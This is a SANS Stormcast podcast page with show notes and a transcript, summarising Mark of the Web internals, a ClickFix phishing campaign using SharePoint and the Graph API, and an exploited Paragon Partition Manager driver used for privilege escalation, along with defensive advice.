Podcast Detail

SANS Stormcast Tuesday Mar 4th: Mark of the Web Details; Sharepint and Click-Fix Phishing; Paragon Partionmanager BYOVD Exploit

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9348.mp3

Podcast Logo
Mark of the Web Details; Sharepint and Click-Fix Phishing; Paragon Partionmanager BYOVD Exploit
00:00

Mark of the Web: Some Technical Details
Windows implements the "Mark of the Web" (MotW) as an alternate data stream that contains not just the "zoneid" of where the file came from, but may include other data like the exact URL and referrer.
https://isc.sans.edu/diary/Mark%20of%20the%20Web%3A%20Some%20Technical%20Details/31732

Havoc Sharepoint with Microsoft Graph API
A recent phishing attack observed by Fortinet uses a simple HTML email to trick a user into copy pasting powershell into their system to execute additional code. Most of the malware interaction uses a Sharepoint site via Microsoft's Graph API futher hiding the malicious traffic
https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2

Paragon Partition Manager Exploit
A vulnerable Paragon Partition Manager has been user recently to escalate privileges for ransomware deployment. Even if you to not have PAragon installed: An attacker may just "bring the vulnerable driver" to your system.
https://kb.cert.org/vuls/id/726882

Podcast Transcript

 Hello and welcome to the Tuesday, March 4th, 2025
 edition of the SANS Internet Storm Center's Stormcast. My
 name is Johannes Ullrich and today I'm recording from
 Baltimore, Maryland. Well, and today we have a great diary by
 Didier showing some of the details of the mark of the
 web. That's a feature that we have covered a few times
 already in the podcast, usually because it didn't get
 properly propagated to different file formats
 depending on, for example, zip file extraction software,
 things like ISO images and the like, where the mark of the
 web is lost in transfer. So the purpose of the mark of the
 web is to indicate to the system that this file has been
 downloaded from the Internet so the user can be presented
 with a warning if this file is executable and the user is
 attempting to execute it. On Windows, the mark of the web
 is implemented as an alternate data stream, which is
 supported by the NTFS file system, but not all file
 systems, and with that, not all archive utilities do
 properly support alternate data streams, which explains
 some of the limitations around the mark of the web
 implementation on Windows. Didier also shows a little bit the
 details here. So first of all, the mark of the web is
 essentially a little text file, like an alternate data
 stream, and it includes, first of all, zone information that
 indicates where the file came from. So there are zones one
 through four that will then tell you three, for example,
 would be this was downloaded from an external website. In
 addition, you may find things like the URL the file was
 downloaded for, the referrer, basically how was the user
 directed to that URL. However, those details then also depend
 on things like the incognitive mode in the browser because
 that would potentially leak private information. So if you
 are in incognito mode, you don't get all of those
 details. Interesting overall, and also like the little hack,
 how you look at the content of the mark of the web at that
 alternative data stream, just in notepad, by specifying the
 alternate data stream as part of your file name as you open
 it. And Fortinet published an interesting piece of research
 regarding some recent phishing attacks that they have
 observed. They start with a simple email that contains an
 HTML attachment. The HTML attachment is something that
 I've actually seen more and more recently. I think we have
 also written some diaries about this. It's what Fortinet
 calls click fix. And what it refers to is if the user opens
 the particular HTML document, they're presented with an
 error message. The error message then instructs them to
 copy-paste code to execute it. Yes, users will do this. The
 user here doesn't really realize what they're doing, of
 course. And that will execute then a PowerShell script that
 installs additional malware. Another sort of interesting
 tidbit here is that the downloads are coming from a
 SharePoint site that the attacker set up and then they
 just use the Graph API in order to interact with that
 SharePoint site. This way, it also becomes quite difficult
 for inter-retection tools and other tools to detect the
 attack because, first of all, the initial email is just an
 HTML email. There is nothing sort of executable really in
 that HTML. It's not like JavaScript or anything like
 this that's often associated with malicious HTML. Well, the
 user here essentially exploits themselves by copy-pasting
 that PowerShell script. And secondly, all the interaction
 with SharePoint, of course, may not necessarily trigger
 alerts because that's usually considered a valid business
 resource and something that you may use for lots of other
 purposes. Then an interesting noteworthy vulnerability is we
 do have a vulnerability in the Paragon Partition Manager.
 Actually, it's not a software itself or part of it. It's
 really the driver that's being delivered with that software.
 That's a kernel-level driver. And as such, it's digitally
 assigned to be trusted to operate at the kernel level,
 which will you need if you are trying to manage partitions.
 The problem is that versions prior to version 2 are
 vulnerable to actually a number of different
 vulnerabilities, one of which is now being exploited by
 ransomware gangs for privilege escalation. It's a little bit
 of a tricky thing. So, first of all, yes, you should update
 Paragon Partition Manager if you run it, but this is even a
 problem if you never installed this software because an
 attacker may install that driver for you and then use it
 for privilege escalation. Microsoft did add this driver
 to its vulnerable driver block list, so make sure you have
 that implemented. But there have been issues with that
 vulnerable driver block list in the past, so not sure how
 well this works these days. Maybe add some signatures as
 such to detect these older versions of the driver just as
 outright malicious if you're not using this software. And
 yes, of course, definitely upgrade if you are using this
 software. Well, and that's it for today. Thanks for
 everybody who noted that I forgot to actually add this
 outro yesterday. Sorry for that. Just forgot to splice it
 in. At the end, if you are interested in taking the
 Introduction Detection class with me that I'm teaching this
 week here in Baltimore, I'll actually be back in Baltimore
 with the same class first week of June. Links to future
 classes, you'll always find them below the show notes for
 the podcast. Thanks and talk to you again tomorrow. Bye.